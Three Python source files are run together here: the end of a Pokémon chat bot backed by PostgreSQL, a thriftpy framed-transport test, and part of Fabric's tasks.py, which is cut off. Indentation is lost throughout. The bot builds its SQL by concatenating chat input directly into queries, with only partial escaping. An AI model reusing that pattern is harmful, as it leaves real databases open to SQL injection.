captureRate = str(captureRate)
return captureRate
def getXPYield(monID, channel,enemylevel,monlevel):
gen = getGeneration(channel)
sql = "SELECT DISTINCT xp.experienceyieldvalue,xp.generationid gen FROM pokemon.pokemonexperienceyield xp "
sql += "WHERE xp.pokemonid = "+monID+" "
sql += "AND xp.generationid <= "+gen+" ORDER BY gen DESC LIMIT 1"
xpYieldArray = performSQL(sql)
if xpYieldArray == []:
xp="unknown"
else:
gen = int(gen)
monyield = xpYieldArray[0][0]
xp = monyield*enemylevel/7
xp=str(int(round(xp,0)))
return xp
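# Worked example for the formula above (assuming a base experience yield of 64 and an
# enemy level of 5): 64 * 5 / 7 = 45.71..., which is rounded and returned as '46'.
# Note that the monlevel argument is currently unused by the calculation.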
def getMonEvos(monID, channel):
gen = getGeneration(channel)
sql = "SELECT DISTINCT mon.pokemonname"
sql += """, pel.pokemonevolutionlevel,
i.itemname, l.locationname, pet.evolutiontypeid, pes.pokemonevolutionuniquestring, m.movename, gg.generationid
FROM pokemon.pokemonevolution pe """
sql += """LEFT JOIN pokemon.pokemon mon ON pe.targetpokemonid = mon.pokemonid """
sql +="""LEFT JOIN pokemon.pokemonevolutionlevel pel ON pe.pokemonevolutionid = pel.pokemonevolutionid
LEFT JOIN pokemon.pokemonevolutionmove pem ON pe.pokemonevolutionid = pem.pokemonevolutionid
LEFT JOIN pokemon.move m ON pem.moveid = m.moveid
LEFT JOIN pokemon.pokemonevolutionitem pei ON pe.pokemonevolutionid = pei.pokemonevolutionid
LEFT JOIN pokemon.item i ON pei.itemid = i.itemid
LEFT JOIN pokemon.pokemonevolutionlocation ploc ON pe.pokemonevolutionid = ploc.pokemonevolutionid
LEFT JOIN pokemon.location l ON ploc.locationid = l.locationid
LEFT JOIN pokemon.pokemonevolutiontype pet ON pe.pokemonevolutionid = pet.pokemonevolutionid
LEFT JOIN pokemon.gamegroup gg ON pe.gamegroupid = gg.gamegroupid
LEFT JOIN pokemon.pokemonevolutionstring pes ON pe.pokemonevolutionid = pes.pokemonevolutionid"""
sql += " WHERE pe.basepokemonid = "+monID+" "
sql += """ AND gg.generationid = (SELECT MAX(gg.generationid) FROM pokemon.pokemonevolution pe
LEFT JOIN pokemon.gamegroup gg ON pe.gamegroupid = gg.gamegroupid
WHERE gg.generationid <="""+gen+""" AND pe.basepokemonid = """+monID+""")
ORDER BY generationid DESC"""
evoArray = performSQL(sql)
if evoArray == []:
evoInfo = "Does not evolve"
else:
evoMon = str(evoArray[0][0])
evoLevel = str(evoArray[0][1])
evoItem = str(evoArray[0][2])
evoLocation = str(evoArray[0][3])
evoType = evoArray[0][4]
evoUnique = str(evoArray[0][5])
evoMove = str(evoArray[0][6])
evoInfo = "Evolves into " + evoMon
if evoType == 2 or evoType == 11:
evoInfo += " via trade"
elif evoType == 3:
evoInfo += " via high friendship"
elif evoType == 12:
evoInfo += " as a female"
elif evoType == 13:
evoInfo += " as a male"
elif evoType == 16:
evoInfo += " during the day"
elif evoType == 17:
evoInfo += " at night"
elif evoType == 20:
evoInfo += " in the rain"
elif evoType == 21:
evoInfo += " via high beauty"
if not evoLevel == 'None':
evoInfo += " at level "+evoLevel
if not evoItem == 'None':
if evoType == 4:
evoInfo += " after being exposed to " + evoItem
else:
evoInfo += " while holding " + evoItem
if not evoLocation == 'None':
evoInfo += " at " + evoLocation
if not evoMove == 'None':
evoInfo += " while knowing " + evoMove
if not evoUnique == 'None':
evoInfo += " " + evoUnique
return evoInfo
def getMonMoves(monID, channel):
game = getGame(channel)
sql = """SELECT DISTINCT mv.movename,pm.pokemonmovelevel FROM pokemon.pokemonmove pm
LEFT JOIN pokemon.move mv ON pm.moveid = mv.moveid
LEFT JOIN pokemon.generationmove gm ON mv.moveid = gm.moveid
LEFT JOIN pokemon.gamegroup gg ON pm.gamegroupid = gg.gamegroupid """
sql += "WHERE pm.pokemonid ="+monID
sql+=" AND pokemonmovelevel > 1 AND gg.gamegroupabbreviation ='"+game+"' ORDER BY pm.pokemonmovelevel ASC"
movesArray = performSQL(sql)
if movesArray == []:
moveList = "Does not learn moves"
else:
moveList = "Learns moves at "
for move in movesArray:
moveList += str(move[1])+", "
#remove the extra comma and space after
moveList = moveList[0:len(moveList)-2]
return moveList
def getMoveInfo(parameters, channel):
if len(parameters) < 1:
info = 'The !move command requires the name of a move as a parameter.'
else:
moveName = combineParameters(parameters)
moveName = moveName.replace("'","''")
gen = getGeneration(channel)
moveID = getMoveID(moveName)
if moveID == []:
info = 'I could not find a move called "' +moveName+'".'
else:
moveList = performSQL("""SELECT m.movename, t.typename, mc.movecategoryname, gm.movecontactflag,
gm.movepp, gm.movepower, gm.moveaccuracy, gm.movepriority, gm.movedescription, gm.generationid
FROM pokemon.generationmove as gm
LEFT JOIN pokemon.move as m ON gm.moveid = m.moveid
LEFT JOIN pokemon.type AS t ON gm.typeid = t.typeid
LEFT JOIN pokemon.movecategory AS mc ON gm.movecategoryid = mc.movecategoryid
WHERE gm.moveid = '""" + moveID + "' AND gm.generationid = " + gen)
if moveList == []:
info = 'I could not find a move called "' +moveName+'" in generation '+gen+'.'
else:
moveList=moveList[0]
if 'True' in str(moveList[3]):
moveContact = "C"
else:
moveContact = "NC"
info = str(moveList[0])+" - Gen " +gen+ ": ("+str(moveList[1])+", "+str(moveList[2])+", "+moveContact+") | PP: "+str(moveList[4])+" | Power: "+str(moveList[5])+" | Acc.: "+str(moveList[6])+" | Priority: "+str(moveList[7])+" | Summary: "+str(moveList[8])
return info
def getAbilityInfo(parameters, channel):
if len(parameters) < 1:
abilityInfo = "The !ability command requires the name of an ability as a parameter."
else:
abilityName = combineParameters(parameters)
abilityName = abilityName.replace("'","''")
gen = getGeneration(channel)
abilityName = abilityName.title()
abilityTuple = performSQL(""" WITH ldist as (SELECT ab.abilityname,ga.abilitydescription,ga.generationid,pokemon.levenshtein(ab.abilityname, '"""+abilityName+"""') AS distance FROM pokemon.generationability ga
LEFT JOIN pokemon.ability ab ON ga.abilityid = ab.abilityid
WHERE ga.generationid <= """+gen+""" )
SELECT * FROM ldist
WHERE distance < 4
ORDER BY distance ASC LIMIT 1""")
if not abilityTuple == []:
abilityName = str(abilityTuple[0][0])
abilitySum = str(abilityTuple[0][1])
print(abilitySum)
abilityInfo = abilityName + " (Gen "+gen+"): " + abilitySum
else:
abilityInfo = "Could not find info for ability '"+abilityName+"' in generation " + gen + "."
return abilityInfo
def getNatureInfo(parameters,channel):
if len(parameters) < 1:
natureInfo = "The !nature command requires the name of a nature as a parameter. (ex: !nature adamant)"
else:
natureName = combineParameters(parameters)
natureList = performSQL("""WITH ldist as (SELECT raisedstat.statname raisedstat,loweredstat.statname loweredstat,
n.neutralnatureflag neutral,
pokemon.levenshtein(n.naturename, '"""+natureName+"""') AS distance FROM pokemon.nature n
LEFT JOIN pokemon.stat raisedstat ON n.raisedstatid = raisedstat.statid
LEFT JOIN pokemon.stat loweredstat ON n.loweredstatid = loweredstat.statid)
SELECT * FROM ldist WHERE distance < 5
ORDER BY distance LIMIT 1""")
if natureList == []:
natureInfo = "Could not find info for "+natureName+"."
else:
raisedStat,loweredStat,neutral,distance = natureList[0]
if 'True' in str(neutral):
natureInfo = natureName + " is a neutral nature."
elif 'False' in str(neutral):
natureInfo = "+"+str(raisedStat)+"/"+"-"+str(loweredStat)
else:
natureInfo = "Could not find info for "+natureName+"."
return natureInfo
def getWeaknessInfo(parameters, channel):
if len(parameters) < 1:
weaknessInfo = "The !weak command requires the name of a Pokemon as a parameter. (ex: !weak kartana)"
else:
monName = combineParameters(parameters)
monID,monName = getMonID(monName,channel)
if monID == None:
return monName
gen = getGeneration(channel)
monTypes = """WITH montypes AS( SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype WHERE generationid = (SELECT MAX(generationid) FROM pokemon.pokemontype WHERE pokemonid = """+monID+""" AND generationid <= """+gen+""") AND pokemonid = """+monID+"""
GROUP BY pokemonid,type1id,type2id ORDER BY pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)), \r\n"""
damage1 = """damage1 as (
SELECT DISTINCT attacktype.typename attacker,SUM(coalesce(tm.damagemodifier::float,1)) as damage
FROM montypes
LEFT JOIN pokemon.typematchup tm ON montypes.type1id = tm.defendingtypeid
LEFT JOIN pokemon.type attacktype ON tm.attackingtypeid = attacktype.typeid
WHERE tm.generationid = """+gen+"""
GROUP BY attacktype.typename),\r\n"""
damage2 = """damage2 as (
SELECT DISTINCT attacktype.typename attacker,SUM(coalesce(tm.damagemodifier::float,1)) as damage
FROM montypes
LEFT JOIN pokemon.typematchup tm ON montypes.type2id = tm.defendingtypeid
LEFT JOIN pokemon.type attacktype ON tm.attackingtypeid = attacktype.typeid
WHERE tm.generationid = """+gen+"""
GROUP BY attacktype.typename) \r\n"""
mainSelect = """SELECT damage1.attacker attacktype,SUM(coalesce(damage1.damage,1) * coalesce(damage2.damage,1)) as totaldamage
FROM damage1 LEFT JOIN damage2 ON damage1.attacker = damage2.attacker
GROUP BY attacktype"""
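# The two CTEs above pull the per-attacking-type damage modifiers against each of the
# defender's (up to) two types; the final SELECT multiplies them, so e.g. a Water attack
# into a Ground/Rock defender combines 2.0 * 2.0 into the 4.0 bucket.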
matchupInfo = performSQL(monTypes+damage1+damage2+mainSelect)
printableDict = {4.0:[],2.0:[],1.0:[],.5:[],.25:[],0:[]}
for type,dmgmodifier in matchupInfo:
printableDict[dmgmodifier].append(type)
monTypes = getMonTypes(monID, channel)
weaknessInfo = monName +" "+ monTypes + ", Gen " +gen+" = \r"
if printableDict[4.0]:
weaknessInfo += "(4x): " + str(printableDict[4.0])+ " // "
if printableDict[2.0]:
weaknessInfo += "(2x): " + str(printableDict[2.0]) + " // "
if printableDict[1.0]:
weaknessInfo += "(1x): " + str(printableDict[1.0]) + " // "
if printableDict[0.5]:
weaknessInfo += "(.5x): " + str(printableDict[0.5]) + " // "
if printableDict[0.25]:
weaknessInfo += "(.25x): " + str(printableDict[0.25]) + " // "
if printableDict[0]:
weaknessInfo += "0x: " + str(printableDict[0])
weaknessInfo = weaknessInfo.replace('[','').replace(']','').replace("\'","")
return weaknessInfo
def getAbbrevs():
abbrevs = performSQL("SELECT DISTINCT gg.gamegroupabbreviation,gg.gamegrouporder FROM pokemon.gamegroup gg INNER JOIN pokemon.game gm ON gg.gamegroupid = gm.gamegroupid ORDER BY gg.gamegrouporder")
message = "Available games are: "
for abbrev in abbrevs:
message += abbrev[0]+", "
message = message[:len(message)-2]
return message
def getGames():
games = performSQL("SELECT gm.gamename,gg.gamegrouporder FROM pokemon.game gm LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid ORDER BY gg.gamegrouporder,gm.gamename")
message = "Available games are: "
for game in games:
message += game[0]+", "
message = message[:len(message)-2]
return message
def dbConfig(configFile = "chatbot.ini",section="database"):
config = configparser.ConfigParser()
config.read(configFile)
db = {}
configuration = config.items(section)
for option in configuration:
db[option[0]] = option[1]
return db
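# dbConfig() feeds its dict straight into psycopg2.connect(**dbConn) below, so the
# [database] section of chatbot.ini is expected to hold standard libpq connection
# keywords. A minimal sketch (values are placeholders, not the real configuration):
#   [database]
#   host = localhost
#   dbname = pokemon
#   user = brdybot
#   password = changeme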
def chatMessage(messageString, channel, server):
server.send(bytes('PRIVMSG #'+ channel + ' :'+messageString+' \r\n', 'utf-8'))
def performSQL(sql):
dbConn = dbConfig()
#print("Connecting to database...")
conn = psycopg2.connect(**dbConn)
with conn.cursor() as cur:
conn.set_session(readonly=False, autocommit=True)
#print("Executing... " +sql)
cur.execute(sql)
result = cur.fetchall()
return result
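# Note: performSQL opens a fresh autocommit connection on every call and always runs
# fetchall(), so each statement routed through it (including the INSERTs above) must
# return rows -- hence the RETURNING clauses. A hypothetical read looks like:
#   rows = performSQL("SELECT channelid FROM bot.channel WHERE channelname = 'somechannel'")
#   channelid = rows[0][0] if rows else None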
def setGame(game, channel, server):
#create an error message if there are no parameters given
if len(game) < 1:
message = "Command !pokegame requires a game name or abbreviation as a parameter. Use !gamelist to see a list."
#if there are parameters, try using it as a game name and fetching an abbreviation
else:
#turn the parameters into a gamename string
gameName = ""
for word in game:
gameName += word
#try using the parameters as an exact match with a game abbreviation
gameName = gameName.upper()
selectedGame = performSQL("""SELECT gg.gamegroupname, gg.gamegroupabbreviation,'null',gm.gamename,gm.gameid
FROM pokemon.gamegroup gg
LEFT JOIN pokemon.game gm ON gg.gamegroupid = gm.gamegroupid
WHERE gg.gamegroupabbreviation = '"""+gameName+"' LIMIT 1")
#if we fail to find a game, try matching the parameters against a full game name with levenshtein distance < 4
if selectedGame == []:
gameName = gameName.title()
selectedGame= performSQL("""WITH ldist as (SELECT gg.gamegroupname, gg.gamegroupabbreviation,pokemon.levenshtein(gm.gamename, '"""+gameName+"""')
AS distance,gm.gamename,gm.gameid FROM pokemon.game gm
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid)
SELECT * FROM ldist WHERE distance < 4
ORDER BY distance LIMIT 1""")
#if we found a game in either query above, find the generation, update the config, and say there was a success!
if not selectedGame == []:
groupName,gameAbbrev,throwAwayVariable,gameName,gameid = selectedGame[0]
updateGame = "UPDATE bot.channel set gameid = "+str(gameid)+" WHERE channelname = '"+channel+"' RETURNING channelid;"
channelid = performSQL(updateGame)
message = "Changed the game to "+gameName+"."
else:
message = gameName+" is not a valid game. Use !abbrevs for a list of valid abbreviations/games. I wasn't able to change the game to "+gameName+"."
return message
def getCoverage(coverageTypes,channel):
gen = getGeneration(channel)
game = getGame(channel)
gameID = str(getGameID(channel))
typeIDs = []
typeNames = []
for coverageType in coverageTypes:
type = performSQL("""WITH ldist AS (SELECT ty.typeid,ty.typename,pokemon.levenshtein(ty.typename,'"""+coverageType+"""')
AS distance FROM pokemon.type ty where ty.generationid <="""+gen+""")
SELECT * FROM ldist WHERE distance < 3 ORDER BY distance LIMIT 1""")
if type == []:
message = coverageType.title()+" is not a valid type in generation "+gen+"."
return message
else:
typeIDs.append(type[0][0])
typeNames.append(type[0][1])
monTypes = """WITH montypes as (
SELECT pokemonid,type1id,type2id
FROM pokemon.crosstab('select pt.pokemonid, typeid as type1id, typeid as type2id
FROM pokemon.pokemontype pt
LEFT JOIN pokemon.pokemongameavailability pga ON pt.pokemonid = pga.pokemonid
LEFT JOIN pokemon.game gm ON pga.gameid = gm.gameid
WHERE pt.generationid ="""+gen+"""
AND gm.gameid = """+gameID+"""
AND pga.pokemonavailabilitytypeid != 18
GROUP BY pt.pokemonid,type1id,type2id ORDER BY pt.pokemonid,type1id,type2id')
AS ct( pokemonid int, type1id int, type2id int)),"""
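# The CASE WHEN pokemonid = 343 clauses built below zero out incoming damage unless the
# attacking type id is in (2,10,13,14,16) -- presumably a hard-coded Wonder Guard
# (Shedinja) exception; the numeric ids are specific to this database.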
damage1 = """damage1 AS (\r\n"""
damage1 += """SELECT montypes.pokemonid,mon.pokemonname,"""
for typeName in typeNames:
damage1 += """CASE WHEN (montypes.pokemonid = 343 AND """+typeName+"""1.attackingtypeid NOT IN(2,10,13,14,16)) THEN 0 ELSE """
damage1 += typeName+"1.damagemodifier::float END as "+typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage1 += "\r\n"
damage1 += """ FROM montypes\r\n
LEFT JOIN pokemon.pokemon mon ON montypes.pokemonid = mon.pokemonid \r\n"""
for typeName in typeNames:
damage1 += "LEFT JOIN pokemon.typematchup "+typeName+"1 ON montypes.type1id = "+typeName+"1.defendingtypeid\r\n"
damage1 += " WHERE "
for typeName in typeNames:
damage1 += typeName+"1.attackingtypeid = "+str(typeIDs[typeNames.index(typeName)])+"\r\n AND "
damage1 += typeName+"1.generationid = "+gen+" "
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += "\r\n AND "
damage1 += "\r\nGROUP BY montypes.pokemonid,mon.pokemonname,"
for typeName in typeNames:
damage1 += typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage1 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage1 += "),\r\n "
damage2 = "damage2 as (SELECT montypes.pokemonid,mon.pokemonname,"""
for typeName in typeNames:
damage2 += """CASE WHEN (montypes.pokemonid = 343 AND """+typeName+"""2.attackingtypeid NOT IN(2,10,13,14,16)) THEN 0 ELSE """
damage2 += typeName+"2.damagemodifier::float END as "+typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += ","
damage2 += """\r\n FROM montypes\r\n
LEFT JOIN pokemon.pokemon mon ON montypes.pokemonid = mon.pokemonid \r\n"""
for typeName in typeNames:
damage2 += "LEFT JOIN pokemon.typematchup "+typeName+"2 ON montypes.type2id = "+typeName+"2.defendingtypeid\r\n"
damage2 += " WHERE "
for typeName in typeNames:
damage2 += typeName+"2.attackingtypeid = "+str(typeIDs[typeNames.index(typeName)])+"\r\n AND "
damage2 += typeName+"2.generationid = "+gen+" "
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += "\r\n AND "
damage2 += "\r\n GROUP BY montypes.pokemonid,mon.pokemonname,"
for typeName in typeNames:
damage2 += typeName+"damage"
if typeNames.index(typeName) < len(typeNames)-1:
damage2 += ","
elif typeNames.index(typeName) == len(typeNames)-1:
damage2 += ") "
preSelect = "SELECT damage, count(*) FROM (\r\n"
mainSelect = "SELECT damage1.pokemonid, GREATEST("
for typeName in typeNames:
mainSelect += "SUM(coalesce(damage1."+typeName+"damage,1) * coalesce(damage2."+typeName+"damage,1))"
if typeNames.index(typeName) < len(typeNames)-1:
mainSelect += ",\r\n "
elif typeNames.index(typeName) == len(typeNames)-1:
mainSelect += ") as damage FROM damage1 LEFT JOIN damage2 ON damage1.pokemonid = damage2.pokemonid "
mainGroup = "GROUP BY damage1.pokemonid "
postSelect = ") AS mondamage GROUP BY damage ORDER BY damage ASC\r\n"
selectString = monTypes+damage1+damage2+preSelect+mainSelect+mainGroup+postSelect
pokemonList = performSQL(selectString)
coverageString = "Types: "
for name in typeNames:
coverageString += name
if typeNames.index(name) < len(typeNames)-1:
coverageString += ", "
coverageString += " - "
pokemonString = "-- Obstacles: "
coverageString += " ("+game+"): "
for array in pokemonList:
coverageString += str(array[0]).replace(".0",".").replace("0.5",".5").replace("0.","0").replace("1.","1").replace("2.","2").replace("4.","4")+"x: "+str(array[1])
if pokemonList.index(array) < len(pokemonList)-1:
coverageString += " // "
if pokemonList[0][0] < .5 and pokemonList[1][0] < .5:
pokemonString = " -- Obstacles < 1x"
limit = pokemonList[0][1]+pokemonList[1][1]
elif pokemonList[0][0] < 1 and pokemonList[1][0] < 1:
pokemonString = " -- Obstacles < 1x"
limit = pokemonList[0][1]+pokemonList[1][1]
elif pokemonList[0][0] < 1 and pokemonList[1][0] == 1:
pokemonString = " -- Obstacles"
limit = pokemonList[0][1]
elif pokemonList[0][0] == 1:
pokemonString = " -- Top 5 1x Threats"
limit = 5
else:
#fallback so that 'limit' is always defined for the size check below
pokemonString = " -- Top Threats"
limit = 5
if int(limit) > 12:
pokemonString += " (Limit 12): "
limit = 12
else:
pokemonString += ": "
bstSelect = "SELECT damage1.pokemonid, mon.pokemonname, GREATEST("
for typeName in typeNames:
bstSelect += "SUM(coalesce(damage1."+typeName+"damage,1) * coalesce(damage2."+typeName+"damage,1))"
if typeNames.index(typeName) < len(typeNames)-1:
bstSelect += ",\r\n "
elif typeNames.index(typeName) == len(typeNames)-1:
bstSelect += """) as damage\r\n
FROM damage1\r\n
LEFT JOIN damage2 ON damage1.pokemonid = damage2.pokemonid\r\n
LEFT JOIN pokemon.pokemon mon ON damage1.pokemonid = mon.pokemonid\r\n"""
monBST = """, monBST as (\r\n
SELECT mon.pokemonid monid,\r\n
mon.pokemonname as monname,\r\n
ps.generationid gen,\r\n
sum(ps.pokemonstatvalue) as bst\r\n
FROM pokemon.pokemonstat ps\r\n
LEFT JOIN pokemon.pokemon mon ON ps.pokemonid = mon.pokemonid\r\n
WHERE ps.generationid <= """+gen+""" GROUP BY monid,monname,gen ORDER BY gen DESC, monid, monname) \r\n"""
preWith = "WITH monDamageQuery as (\r\n"
postWith = ")"
bstGroup = " GROUP BY damage1.pokemonid,mon.pokemonname \r\n"
bstOrder = " ORDER BY damage ASC\r\n"""
realSelect = """SELECT damage, bst, monDamageQuery.pokemonname, monBST.gen FROM monDamageQuery
LEFT JOIN monBST ON monDamageQuery.pokemonid = monBST.monid
GROUP BY damage, bst, monDamageQuery.pokemonname, monBST.gen
ORDER BY damage ASC, bst DESC, monDamageQuery.pokemonname, monBST.gen"""
coverageQuery = monTypes+damage1+damage2+bstSelect+bstGroup+bstOrder
sql = preWith+coverageQuery+postWith+monBST+realSelect
pokemonBSTList = []
pokemonIDs = performSQL(sql)
if len(pokemonIDs) == 0:
pokemonString += "None"
for obstacle in pokemonIDs:
if len(pokemonBSTList) < int(limit):
obstacleName = obstacle[2]
if not obstacleName in pokemonBSTList:
pokemonBSTList.append(obstacleName)
pokemonString += obstacleName+", "
#only strip the trailing ", " when obstacle names were actually appended
pokemonString = pokemonString[0:len(pokemonString)-2] if pokemonString.endswith(", ") else pokemonString
coverageString += pokemonString
coverageString = coverageString.replace(" Form)",")")
return coverageString
def getGameID(channel):
gameID = performSQL("""SELECT gameid FROM bot.channel WHERE channelname = '"""+channel+"'")[0][0]
return gameID
def getGame(channel):
game = performSQL("""SELECT gg.gamegroupabbreviation FROM bot.channel ch
LEFT JOIN pokemon.game gm ON ch.gameid = gm.gameid
LEFT JOIN pokemon.gamegroup gg ON gm.gamegroupid = gg.gamegroupid
WHERE ch.channelname = '"""+channel+"'")[0][0]
return game
if __name__ == "__main__":
main()
|
test_framed_transport.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import socket
import threading
import time
from os import path
from unittest import TestCase
from tornado import ioloop
import thriftpy
from thriftpy.tornado import make_server
from thriftpy.rpc import make_client
from thriftpy.transport.framed import TFramedTransportFactory
from thriftpy.protocol.binary import TBinaryProtocolFactory
from thriftpy._compat import CYTHON
logging.basicConfig(level=logging.INFO)
addressbook = thriftpy.load(path.join(path.dirname(__file__),
"addressbook.thrift"))
class Dispatcher(object):
def __init__(self, io_loop):
self.io_loop = io_loop
self.registry = {}
def add(self, person):
"""
bool add(1: Person person);
"""
if person.name in self.registry:
return False
self.registry[person.name] = person
return True
def get(self, name):
"""
Person get(1: string name)
"""
if name not in self.registry:
raise addressbook.PersonNotExistsError()
return self.registry[name]
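# The test case below starts a tornado-based framed-transport server on an ephemeral
# port in a daemon thread, then exercises it with a blocking thriftpy client that uses
# the same framed transport / binary protocol pair.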
class FramedTransportTestCase(TestCase):
TRANSPORT_FACTORY = TFramedTransportFactory()
PROTOCOL_FACTORY = TBinaryProtocolFactory()
def mk_server(self):
self.io_loop = ioloop.IOLoop()
server = make_server(addressbook.AddressBookService,
Dispatcher(self.io_loop), io_loop=self.io_loop)
self.server = server
sock = self.server_sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
sock.bind(('localhost', 0))
sock.setblocking(0)
self.port = sock.getsockname()[-1]
self.server_thread = threading.Thread(target=self.listen)
self.server_thread.setDaemon(True)
self.server_thread.start()
def listen(self):
self.server_sock.listen(128)
self.server.add_socket(self.server_sock)
self.io_loop.start()
def mk_client(self):
return make_client(addressbook.AddressBookService,
'127.0.0.1', self.port,
proto_factory=self.PROTOCOL_FACTORY,
trans_factory=self.TRANSPORT_FACTORY)
def setUp(self):
self.mk_server()
time.sleep(0.1)
self.client = self.mk_client()
def test_able_to_communicate(self):
dennis = addressbook.Person(name='Dennis Ritchie')
success = self.client.add(dennis)
assert success
success = self.client.add(dennis)
assert not success
def test_zero_length_string(self):
dennis = addressbook.Person(name='')
success = self.client.add(dennis)
assert success
success = self.client.get(name='')
assert success
if CYTHON:
from thriftpy.transport.framed import TCyFramedTransportFactory
from thriftpy.protocol.cybin import TCyBinaryProtocolFactory
class CyFramedTransportTestCase(FramedTransportTestCase):
PROTOCOL_FACTORY = TCyBinaryProtocolFactory()
TRANSPORT_FACTORY = TCyFramedTransportFactory()
|
tasks.py
|
import inspect
import six
import sys
import textwrap
from fabric import state
from fabric.utils import abort, warn, error
from fabric.network import to_dict, disconnect_all
from fabric.context_managers import settings
from fabric.job_queue import JobQueue
from fabric.task_utils import crawl, merge, parse_kwargs
from fabric.exceptions import NetworkError
if sys.version_info[:2] == (2, 5):
# Python 2.5 inspect.getargspec returns a tuple
# instead of ArgSpec namedtuple.
class ArgSpec(object):
def __init__(self, args, varargs, keywords, defaults):
self.args = args
self.varargs = varargs
self.keywords = keywords
self.defaults = defaults
self._tuple = (args, varargs, keywords, defaults)
def __getitem__(self, idx):
return self._tuple[idx]
def patched_get_argspec(func):
return ArgSpec(*inspect._getargspec(func))
inspect._getargspec = inspect.getargspec
inspect.getargspec = patched_get_argspec
def get_task_details(task):
details = [
textwrap.dedent(task.__doc__)
if task.__doc__
else 'No docstring provided']
argspec = inspect.getargspec(task)
default_args = [] if not argspec.defaults else argspec.defaults
num_default_args = len(default_args)
args_without_defaults = argspec.args[:len(argspec.args) - num_default_args]
args_with_defaults = argspec.args[-1 * num_default_args:]
details.append('Arguments: %s' % (
', '.join(
args_without_defaults + [
'%s=%r' % (arg, default)
for arg, default in zip(args_with_defaults, default_args)
])
))
return '\n'.join(details)
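# For a hypothetical task defined as `def deploy(branch, force=False)` with no
# docstring, this returns roughly:
#   No docstring provided
#   Arguments: branch, force=False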
def _get_list(env):
def inner(key):
return env.get(key, [])
return inner
class Task(object):
"""
Abstract base class for objects wishing to be picked up as Fabric tasks.
Instances of subclasses will be treated as valid tasks when present in
fabfiles loaded by the :doc:`fab </usage/fab>` tool.
For details on how to implement and use `~fabric.tasks.Task` subclasses,
please see the usage documentation on :ref:`new-style tasks
<new-style-tasks>`.
"""
name = 'undefined'
use_task_objects = True
aliases = None
is_default = False
# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts_and_effective_roles(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return a tuple containing the host list the given task should be using
and the roles being used.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
.. versionchanged:: 1.9
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs), arg_roles
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs), func_roles
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = list(map(_get_list(env), "hosts roles exclude_hosts".split()))
env_vars.append(roledefs)
return merge(*env_vars), env.get('roles', [])
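# Precedence illustrated with hypothetical values: execute(mytask, hosts=['web1'])
# beats @hosts('web2') on the task itself, which in turn beats env.hosts = ['web3'];
# only when all of those are empty does this return an empty host list.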
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
orig = self
while 'wrapped' in orig.__dict__:
orig = orig.__dict__.get('wrapped')
return get_task_details(orig)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def _is_network_error_ignored():
return not state.env.use_exceptions_for['network'] and state.env.skip_bad_hosts
def _parallel_wrap(task, args, kwargs, queue, name, env):
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
# all set correctly and explicitly
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
state.env.update(env)
try:
state.connections.clear()
queue.put({'name': name, 'result': task.run(*args, **kwargs)})
except BaseException as e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
